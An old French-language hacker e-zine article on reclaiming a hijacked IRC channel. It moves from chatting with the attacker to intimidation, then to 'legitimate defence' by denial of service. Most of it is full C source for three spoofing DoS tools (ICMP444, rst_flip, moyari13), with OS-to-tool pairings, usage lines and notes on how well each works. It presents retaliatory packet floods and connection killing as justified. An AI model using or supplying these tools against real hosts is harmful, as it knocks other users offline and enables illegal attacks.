Reprendre son channel irc victime d'un TO By Lionel ___________________________________________________ 1)Intro ------- Ce texte est a un but de securité et d'education.Vous en avez marre que des mecs vous fasse des "TO"(take over) sur vos channel irc!!! Now j'ai la solution pour reprendre votre chan! 2)Les methodes -------------- Je vais les prendres dans l'ordre: -Discuter avec le pirate borné! /* la premiere chose a faire */ -S.E. /* dexième solution */ -DoS /* dernière solution */ La vous vous dites , "legal le DoS , tu rigole!".Ben non moi j'appelle ca de la legitime defense :o),biensur toujours tester les 2premieres methodes avant c'est toujours mieux de s'arrenger à la miable! 3)Discuter avec un "idiot" -------------------------- Bon cette methode marche 1 fois sur 1000 :o) , car y a pas beaucoups de pirate intelligent. Quesqui faut lui dire? toi-Salut , pourquoi tu as fais ca? idiot-Ben parce que ton channel c'est un grosse merde! (garder son calme malgré les insultes :o) toi-C'est peut etre vrai , bon maintenent que tu as gagné re donne moi mon channel s'il-te plait .... (alors la 2reponses possible:) a)idiot-Oui tous de suite ( ben la c'est un miracle!) b)idiot-Tu reve sale boufon! (ca c'est la realitée!) Bon ben si la reponse est a ta gagné et si c'est b ben on passe au plan b :) (j'ai toujours revé de dire ca ;) 4)Plan b (S.E.) --------------- (S.E.=social engine) Donc cette methode marche deja mieux 1chance sur 2 pour retrouver ton channel :o) ... La but est tres simple faire peur pour faire partir la crasse ...;) exemple(imaginons que the idiot a fait un TO sur ton channel par des moyen illegal,style DoS): toi-Salut , t'aurrais jamais dut faire ca :) idiot-Ou la la j'ai peur , maman! toi-mouarf , tu vois ce que tu viens de faire est punit par la loi! idiot- merde alors! toi:je vais porté plainte contre toi , tous de suite! (alors la 2 reaction possible un signoff-idiot-(LEAVING) ou la reponse qui suis:) idiot- je m'en foue , de toute facon c'est un compte pirate :)))) toi: apparament vue que tu es idiot je t'explique un truc , quand tu te connecte ton n° de tel s'affiche chez le provider donc si je porte en plainte en disant que en plus c'est un conte pirate tu vas avoir une bonne peine de prison , on va pas te revoir avant quelque années :) (idiot alors la ou il se casse en courant ou il repond encore!) idiot- Va y porte plainte je m'en foue! Bon ou vous etes passient et vous continuez a lui faire peur (il est possible aussi que vous portiez vraiment plainte abuse@provider.fr , et vous donnez les logs des attaques + que c'est un abo pirate .....) Bon si apres tous ca il veut toujours pas comprendre , l'artillerie lourde s'impose!!! 5)The légitime defense! (DoS) ----------------------------- a)riposte --------- Dans ce cas je considère ca comme de la legitime defence! Bon deja il faut determiner l'os de l'agresseur!Bon j'espere que vous assez malin pour savoir comment faire , vous avez le choix (/ver ou scan port ...). A chaque OS different une riposte differente: win3.1/95/98/NT (avec ou sans pc conseal firewall) & mac OS : riposte: DESTROY(1234.c) ou ICMP444 ou RST_FLIP win98/2000/NT? riposte: Kod , moyari13 ,... (ICMP ou IGMP type 13) Linux kernel < ou = 2.0.33 riposte: TEARDROP, SYNDROP , OVERDROP , ICMP444 , RST_FLIP Linux Kernel > 2.0.33 & UNIX systeme *** riposte: ICMP444, RST_FLIP Linux Kernel = 2.2.10 riposte: icmp444, RST_FLIP (il y aussi un DoS contre se kernel qui viens de sortir). b)codes expliquations --------------------- Destroy: est un compilation de DoS (1234.c , smurf , teardrop ....) ------- ICMP444: c'est un code fait par cod4(hotcode)(noroute) qui exploit l'icmp a ------- plusieur but. RST_FLIP: c'est un code qui envoie un FLAG reset a une connexionen cours: -------- A:serveur B:agresseur C:vous (risposte) A-----conexion-------B A et B sont connectés A------|-------B C------- C envoie d'un flag RST avec host src "A" A---|||------B connexion entre A et B coupé Kod,moyari13,...: ces codes envoies un packet ICMP ou IGMP de type 13. ---------------- TEARDROP, SYNDROP , OVERDROP: ces codes envoies des packets UDP ... ----------------------------- Bon c'etais juste de l'informations pour vos petite cervelle ;) c)codes ------- Destroy: ======== voir dans le mag package: came.tar /* EOF */ ICMP444: ======== /* * icmp444.c ver 0.3 pareil ke la ver 0.2 mais avec un nuker integrer :) devil~# icmp444c E www.nasa.gov ip_of_sucker size_of_echo for overload a machine: devil~# icmp444 O www.nasa.gov www.fbi.gov ip_of_sucker ok it's all :) CoD4 #phe boor@hotmail.com greetz giemor pirus mikasoft */ #define IPHDRSIZE sizeof(struct iphdr) #define ICMPHDRSIZE sizeof(struct icmphdr) #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef SYSV #define bcopy(s1,s2,len) memcpy(s2,s1,len) #endif /* fonction rippe'e ki sert a calculer les cheksums */ /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* autre fonction ripe'e ki sert a convertir les noms en ip */ unsigned int host2ip(char *serv) { struct sockaddr_in sin; struct hostent *hent; hent = gethostbyname(serv); if(hent == NULL) return 0; bzero( (char *)&sin, sizeof(sin) ); bcopy(hent->h_addr, (char *)&sin.sin_addr, hent->h_length); return sin.sin_addr.s_addr; } /* on attakons the kOd */ main(int argc, char **argv) { struct sockaddr_in sin_dst; unsigned char packet[4098]; struct iphdr *ip; struct icmphdr *icmp; struct iphdr *ipfake; unsigned char *data; unsigned s_port; unsigned t_port; int s; int i; int DATA; int s_portinc,t_portinc; ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet+IPHDRSIZE); ipfake = (struct iphdr*)(packet+IPHDRSIZE+ICMPHDRSIZE ); data = (char *)(packet+IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE); memset(packet, 0, 4098); printf(" ICMP444 ready for action ! CoD4 #PhE\n\n"); if(argc == 1) { printf(" for make a flood echo spoofing \n"); printf(" icmp444 E \n"); printf(" ~#icmp444 E www.nasa.gov ppp123.sucker.com 1000\n\n"); printf(" for the overload the machine \n"); printf("icmp444 O \n"); printf("~icmp444 0 www.nasa.gov www.fbi.gov ppp42.sucker.com \n\n"); printf("NUKE !!!\n\n"); printf(" generic nuke (icmp to the serveur)\n\n"); printf("icmp444 X \n"); printf("~#icmp444 X irc.devil.com 6667 ppp45.sucker.com 1020 2 \n\n"); printf("for nuke a man on unix or win 95 & NT (is cool for the bot ;)) \n "); printf("icmp444 X \n"); printf("icmp444 N ppp56.sucker.com 1020 irc.devil.com 6667 2 \n\n"); printf(" voila :)\n\n CoD4 boor@hotmail.com\n"); exit(0); } /* ziva ke je t'ouvre une raw-chaussette */ s = socket(AF_INET, SOCK_RAW, 255); if (s < 0) { fprintf(stderr, "cant open raw socket\n"); exit(0); } /* bha je sais comment expliker ca mais disons ke c pour dire au reseau kon va faire nos propre tit pakete ( mais vraiment gros ) */ #ifdef IP_HDRINCL if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i)) < 0) { fprintf(stderr, "cant set IP_HDRINCL\n"); close(s); exit(0); } #endif /* la on aorde le ECHO flood SPOOF */ if ( argv[1][0]=='E') { DATA = atoi(argv[4]); /* la taille du data */ /* on mais dans l'en tete IP nos adresse de soure et destination */ ip->saddr = host2ip(argv[2]); /* la spoof adresse */ ip->daddr = host2ip(argv[3]); ip->version = 4; ip->ihl = 5; ip->ttl = 255; ip->protocol = 1; ip->tot_len = htons(IPHDRSIZE +ICMPHDRSIZE+DATA); /* taille */ ip->tos = 0; ip->id = 0; ip->frag_off = 0; ip->check = in_cksum(packet,IPHDRSIZE); /* cheksum du pakeip */ icmp->type = 8; /* type et code de l'eche reply */ icmp->code = 0; icmp->checksum = in_cksum(icmp,ICMPHDRSIZE+DATA); /* cheksum du paket icmp faut pas oubier DATA nan plus */ /* comme la fonction sendto a besoin de certain truc */ /* vi faut remplire la struct sockaddr mais bon c pas terrible */ sin_dst.sin_addr.s_addr = ip->daddr; sin_dst.sin_family = AF_INET; printf(" HEY ! %s u r dead \n",argv[3] ); for(;;){ sendto( s,packet,IPHDRSIZE+ICMPHDRSIZE+DATA,0, (struct sockaddr *)&sin_dst,sizeof(struct sockaddr) ); } } /* Hop la une tite boucle ki envoye au mec de jolie tit echo requeste spoofer mouhahahaha si il manke des 'B" c ke mon B deconne grave */ /* l'option overload le truc est tres simple c de faire une erreur de chsksum */ if ( argv[1][0]=='O' ) { unsigned int IP1; unsigned int IP2; /* on se la joue classique */ IP1 = host2ip( argv[2] ); IP2 = host2ip( argv[3] ); ip->daddr = host2ip( argv[4] ); ip->version = 4; ip->ihl = 5; ip->ttl = 255; ip->protocol = 1; ip->tot_len = htons( IPHDRSIZE +ICMPHDRSIZE ); ip->id = 2; ip->frag_off = 0; ip->tos = 0; ip->check = in_cksum(packet,IPHDRSIZE); /* on mais le type et le code kon veut on s'en balance sec */ icmp->type = 3; icmp->code = 5; icmp->checksum = 1234; /* la on voit le beau cheksum :))) */ printf(" HEY ! %s humm U have a 8086 ??? \n",argv[4] ); for(;;) { ip->saddr = IP1; sin_dst.sin_addr.s_addr = ip->daddr; sin_dst.sin_family = AF_INET; sendto( s,packet,IPHDRSIZE+ICMPHDRSIZE,0, (struct sockaddr *)&sin_dst,sizeof(struct sockaddr) ); ip->saddr = IP2; sin_dst.sin_addr.s_addr = ip->daddr; sendto( s,packet,IPHDRSIZE+ICMPHDRSIZE,0, (struct sockaddr *)&sin_dst,sizeof(struct sockaddr) ); } } /* re tite boucle de fou :)) */ /* heheh des GOTO =) je sais ca fait pas serieux mais hin je fais pas demomaker moi je cree ca marche BASTA ! nan mais de toute celui k pas d'accord je le nuke a vie ! */ if( argv[1][0]=='X' ) { s_portinc=0; t_portinc=1; goto go; } if ( argv[1][0]=='N' ) { s_portinc=1; t_portinc=0; go: /* pour la nuke pas de secret c le meme en tete ip */ ip->saddr = host2ip( argv[4] ); ip->daddr = host2ip( argv[2] ); s_port=atoi( argv[3] ); t_port=atoi( argv[5] ); ip->version = 4; ip->ihl = 5; ip->ttl = 255; ip->protocol = 1; ip->tot_len = htons( IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8 ); ip->tos = 0; ip->id = 2; ip->frag_off = 0; ip->check = in_cksum( packet, IPHDRSIZE ); /* toujours le type 3 ! le code c comme vous voulez */ icmp->type = 3; icmp->code = atoi( argv[6] ); /* on commence a creer ce soit disant datagramme ki aurait causer l'erreure */ /* la vous voyez c le datagramme kon va renvoyer avec l'icmp piger */ ipfake->saddr = ip->daddr; ipfake->daddr = ip->saddr; ipfake->version = 4; ipfake->ihl = 5; ipfake->ttl = 255; ipfake->protocol = IPPROTO_TCP; ipfake->tot_len = htons(IPHDRSIZE+36); ipfake->tos = 0; ipfake->id = 22; ipfake->frag_off = 0; ipfake->check = in_cksum(ipfake,IPHDRSIZE); for(;;) { /* la on cree l'en tete tcp */ /* on mais le port source etc */ *( (unsigned int *)data ) = htons(s_port); *( (unsigned int *)(data+2) ) = htons(t_port); *( (unsigned long *)(data+4) ) = 6580; /* SURTOUT oulier pas de remetre a 0 le cheksum avant de le calculer !!*/ icmp->checksum=0; icmp->checksum = in_cksum(icmp,36); /* toujours pareil nos sales struct a remplir */ sin_dst.sin_addr.s_addr = ip->daddr; sin_dst.sin_family = AF_INET; sendto( s,packet,IPHDRSIZE+36,0, (struct sockaddr *)&sin_dst,sizeof(struct sockaddr) ); printf( "sport,tport:%i,%i\n\n",s_port,t_port ); s_port = s_port+s_portinc; t_port = t_port+t_portinc; usleep(200); } } } ---EOF--- Ce code est dans son article sur la programmation "Icmp" (noroute3), ma reference ... RST_Flip: ========= /* rst_flip 1998(C) krypt@enteract.com - http://www.rootshell.com/ This is a DOS attack against an existing connection where one of the hosts is a Linux, SunOS, FreeBSD and possibly others. I did not have time to test this code thoroughly.It's purpose is merely to illustrate that it is possible to cause a conenction to be dropped by sending a couple of customized packets to one of the hosts. The usage is quite simple: rst_flip where A and B are the hosts currently having a session and you do not want them to. To check if your hosts are vulnerable you can use scenario like this: Say host A (Windows 10.10.3.21) is connected to port 21 of host B (SunOS - 10.10.1.23). Since it is usually unknown what port A has utilized for this connection ( it is higher than 1024,most of the time :) we have to consider the possible range. So you would do: rst_flip 10.10.3.21 10.10.1.23 1024 2000 21 21 I am in no way responsible for whatever happens after this point. Do not laugh at the code because i already know that. I'll work on it later. It compiles on Linux. cc -o rst_flip rst_flip.c Mad thanks to: tootin. Greets to: l0ck. */ #include #include #include #include #include #include #include #include #include #include #include #define TCPHDR sizeof(struct tcphdr) #define IPHDR sizeof(struct iphdr) #define PACKETSIZE TCPHDR + IPHDR #define SLEEPTIME 30000 // depending on how fast can you barf the packets out #define LO_RST 1 // #define HI_RST 2147483647 // do not ask me about this :) #define ERROR_FAILURE -1 #define ERROR_SUCCESS 0 void resolve_address(struct sockaddr *, char *, u_short); unsigned short in_cksum(unsigned short *,int ); int send_rst(char *, char *, u_short ,u_short , u_long, u_long,u_long); int main(int argc, char *argv[]) { int res,i,j; int spoof_port,target_port; if (argc < 7 || argc> 8 ) { printf ("usage: \n[ http://www.rootshell.com/ ]\n"); exit(ERROR_FAILURE); } for (i = atoi(argv[3]);i <= atoi(argv[4]); i++) { spoof_port = i; for (j = atoi(argv[5]);j <= atoi(argv[6]); j++) { target_port = j; printf("%s : %d \t", argv[1],spoof_port); printf("-> %s :%d\n",argv[2], target_port); res=send_rst(argv[1],argv[2],spoof_port,target_port, HI_RST, HI_RST, 2); usleep(SLEEPTIME); res=send_rst(argv[1],argv[2],spoof_port,target_port, LO_RST,LO_RST, 2); usleep(SLEEPTIME); } } return ERROR_SUCCESS; } // here we put it together int send_rst(char *fromhost, char *tohost, u_short fromport,u_short toport, u_long ack_sq, u_long s_seq, u_long spoof_id) { int i_result; int raw_sock; static struct sockaddr_in local_sin, remote_sin; struct tpack{ struct iphdr ip; struct tcphdr tcp; }tpack; struct pseudo_header{ // pseudo header 4 the checksum unsigned source_address; unsigned dest_address; unsigned char placeholder; unsigned char protocol; unsigned short tcp_length; struct tcphdr tcp; }pheader; resolve_address((struct sockaddr *)&local_sin, fromhost, fromport); resolve_address((struct sockaddr *)&remote_sin, tohost, toport); // TCP header tpack.tcp.source=htons(fromport); // 16-bit Source port number tpack.tcp.dest=htons(toport); // 16-bit Destination port tpack.tcp.seq=ntohl(s_seq); // 32-bit Sequence Number */ tpack.tcp.ack_seq=ntohl(ack_sq); // 32-bit Acknowledgement Number */ tpack.tcp.doff=5; // Data offset */ tpack.tcp.res1=0; // reserved */ tpack.tcp.res2=0; // reserved */ tpack.tcp.urg=0; // Urgent offset valid flag */ tpack.tcp.ack=1; // Acknowledgement field valid flag */ tpack.tcp.psh=0; // Push flag */ tpack.tcp.rst=1; // Reset flag */ tpack.tcp.syn=0; // Synchronize sequence numbers flag */ tpack.tcp.fin=0; // Finish sending flag */ tpack.tcp.window=0; // 16-bit Window size */ tpack.tcp.check=0; // 16-bit checksum (to be filled in below) */ tpack.tcp.urg_ptr=0; // 16-bit urgent offset */ // IP header tpack.ip.version=4; // 4-bit Version */ tpack.ip.ihl=5; // 4-bit Header Length */ tpack.ip.tos=0; // 8-bit Type of service */ tpack.ip.tot_len=htons(IPHDR+TCPHDR); // 16-bit Total length */ tpack.ip.id=htons(spoof_id); // 16-bit ID field */ tpack.ip.frag_off=0; // 13-bit Fragment offset */ tpack.ip.ttl=64; // 8-bit Time To Live */ tpack.ip.protocol=IPPROTO_TCP; // 8-bit Protocol */ tpack.ip.check=0; // 16-bit Header checksum (filled in below) */ tpack.ip.saddr=local_sin.sin_addr.s_addr; // 32-bit Source Address */ tpack.ip.daddr=remote_sin.sin_addr.s_addr; // 32-bit Destination Address */ // IP header checksum tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR); // TCP header checksum pheader.source_address=(unsigned)tpack.ip.saddr; pheader.dest_address=(unsigned)tpack.ip.daddr; pheader.placeholder=0; pheader.protocol=IPPROTO_TCP; pheader.tcp_length=htons(TCPHDR); bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR); tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12); // Get a socket and send the thing raw_sock = socket(AF_INET, SOCK_RAW, 255); if (raw_sock==-1) { perror("can't open a raw socket."); exit(ERROR_FAILURE); } i_result = sendto(raw_sock,&tpack,PACKETSIZE,0,(struct sockaddr *)&remote_sin,sizeof(remote_sin)); if (i_result != PACKETSIZE) perror("error sending packet"); close(raw_sock); } // this is stolen :) unsigned short in_cksum(unsigned short *ptr,int nbytes) { register long sum; // assumes long == 32 bits u_short oddbyte; register u_short answer; // assumes u_short == 16 bits sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; // make sure top half is zero *((u_char *) &oddbyte) = *(u_char *)ptr; // one byte only sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); // add high-16 to low-16 sum += (sum >> 16); // add carry answer = ~sum; // ones-complement, then truncate to 16 bits return(answer); } // Resolve the address and populate the sin structs void resolve_address(struct sockaddr * addr, char *hostname, u_short port) { struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *)addr; (void) bzero( (char *)address, sizeof(struct sockaddr_in) ); address->sin_family = AF_INET; address->sin_port = htons(port); address->sin_addr.s_addr = inet_addr(hostname); if ((int)address->sin_addr.s_addr == -1) { host = gethostbyname(hostname); if (host) { bcopy( host->h_addr, (char *)&address->sin_addr,host->h_length); } else { puts("Couldn't resolve the address!!!"); exit(ERROR_FAILURE); } } } ---EOF--- moyari13: ========= /* moyari13.c by R00t Zer0( defcon0@ugtop.com) */ /* Windows 98's TCP/IP stack chokes on ICMP-Type13( timestamp request) */ #include #include #include #include #include #include #include #include #include #include #define __FAVOR_BSD #include #include #include #define IP_SIZE sizeof( struct iphdr ) u_short in_cksum( u_short *addr, int len ) { int nleft = len; u_short *w = addr; int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while( nleft > 1 ) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *( u_char *)( &answer ) = *( u_char *)w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = ( sum >> 16 ) + ( sum & 0xffff ); /* add hi 16 to low 16 */ sum += ( sum >> 16 ); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return( answer ); } int send_icmp_packet( int sock_send, u_long src_addr, u_long dst_addr ) { char *packet, *cksum; /* packet, cksum */ int send_status, loop; struct iphdr *ip; /* ip header */ struct icmp *icp; /* icmp header */ struct sockaddr_in from; /* sockaddr */ struct sockaddr_in to; /* sockaddr */ /************************************/ /* get and init packet_memory_area */ /************************************/ packet = ( char *)malloc( IP_SIZE + 20 ); ip = ( struct iphdr *)( packet ); icp = ( struct icmp *)( packet + IP_SIZE ); memset( packet, 0, IP_SIZE + 20 ); /****************/ /* IP header */ /****************/ ip->saddr = src_addr; ip->daddr = dst_addr; ip->version = 4; ip->ihl = IP_SIZE / 4; ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->id = 0x01; ip->tot_len = htons( IP_SIZE + 20 ); ip->check = in_cksum( (u_short *)ip, IP_SIZE ); /****************/ /* ICMP header */ /****************/ icp->icmp_type = 13; icp->icmp_code = 0; icp->icmp_cksum = 0; /************************************/ /* ICMP_id, ICMP_sequence = 0xffff */ /************************************/ for( loop = IP_SIZE + 4; loop < IP_SIZE + 4 + 4; loop++ ) *( packet + loop ) = 0xff; /********************************************************/ /* ICMP_type13_otime/rtime/ttime = rand() % 0xffffffff */ /********************************************************/ for( loop = IP_SIZE + 4 + 4; loop < IP_SIZE + 4 + 4 + 12; loop++ ) *( packet + loop ) = rand() % 0xff; /************************/ /* set ICMP_checksum */ /************************/ icp->icmp_cksum = in_cksum( ( u_short *)( packet + IP_SIZE ), 4 + 16 ); /********************/ /* send 1 packets */ /********************/ bzero( (char *)&to, sizeof( to ) ); to.sin_family = AF_INET; to.sin_addr.s_addr = ip->daddr; send_status = sendto( sock_send, packet, IP_SIZE + 20, 0, ( struct sockaddr *)&to, sizeof( struct sockaddr ) ); free( packet ); return( send_status ); } int main( int argc, char *argv[] ) { char tmp_buffer[ 1024 ]; /* tmp_buffer */ int loop, loop2; /* loop counter */ int sock_send; /* socket_fd */ u_long src_addr, dst_addr; /* src/dst addr */ time_t t; /* init_rand_seed(time) */ struct hostent *host; /* hostinfo(hostent) */ struct sockaddr_in addr; /* (sockaddr_in)addr */ /************************/ /* print usage(error) */ /************************/ if( argc != 3 ) { printf( "Usage : %s \n", argv[0] ); exit( -1 ); } /********************/ /* init rand_seed */ /********************/ t = time( 0 ); srand( ( u_int )t ); /********************/ /* Get src_address */ /********************/ gethostname( tmp_buffer, 128 ); host = gethostbyname( tmp_buffer ); if( host == NULL ) { printf( "Can't get this machine's hostname\n" ); exit( -1 ); } memcpy( &src_addr, host->h_addr, 4 ); /********************/ /* Get dst_address */ /********************/ memset( &addr, 0, sizeof( struct sockaddr_in ) ); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr( argv[1] ); if( addr.sin_addr.s_addr == -1 ) { host = gethostbyname( argv[1] ); if( host == NULL ) { printf( "Unknown host %s.\n", argv[1] ); exit( -1 ); } addr.sin_family = host->h_addrtype; memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length ); } memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 ); /********************/ /* open RAW_socket */ /********************/ if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1) { perror( "Getting raw send socket" ); exit( -1 ); } #if 0 /* fake */ src_addr = inet_addr( "89.89.89.89" ); #endif /****************************/ /* - m o - y a - r i - */ /****************************/ printf( "[ moyari13 ( TimeStump request) Attack ]\n\n" ); printf( "sending..." ); for( loop = 0; loop < atoi( argv[2] ); loop++ ) { #if 1 /* spoof( random ) */ src_addr = rand() % 0xffffffff; #endif send_icmp_packet( sock_send, src_addr, dst_addr ); printf( "." ); fflush( stdout ); } printf( "\nDone.\n" ); close( sock_send ); exit( 0 ); } ---EOF--- Bien sur ces codes son a utilisé en cas de légitime defense!!! d)probleme de rst_flip ---------------------- Ce code marche 1 coups sur 2.J'ai remarqué que le lancer sur une personne arrivante et qui n'est pas encore parlé , ca le deconnecte , mais si cette personne a deja fait des actions le code se révele inutile.Je pensse que se probleme viens que les n° de sequence change ou un truc comme ca et donc il donne de mauvais parametres et le packet devient null. e)ICMP444 Marche tres bien a condition que l'agresseur n'est pas mis de filtrage sur les packets icmp. f)Les ports source ------------------ port source win: entre 1024/2000 la plus part du temps port source unix: entre 1024/10000 environ mais defois c'est plus... 6)Conculsion ------------ N'oublié jamais que le DoS est illegal... 5) Greetz --------- To: clemm, spoty , ank , k-roleen, shado, cod4&hotcode(big boss ;), klog, rockme, XSFX, 3d13, organiks,[fred], torcy&marcx dormoy&18eme (Ali k., Xav,Olivier,Mathieux,Mémet,Arnauld,Camel,...),cantepeau(sophie,ced,youness, seb,la shente,bouboule,ouadgerie, ...), toulouse(Gui.,florian,Lionel,JM,Dav, Vincent,Bruno,yohan,seb,cyril,damien,...).......Et tous ce que j'oublie...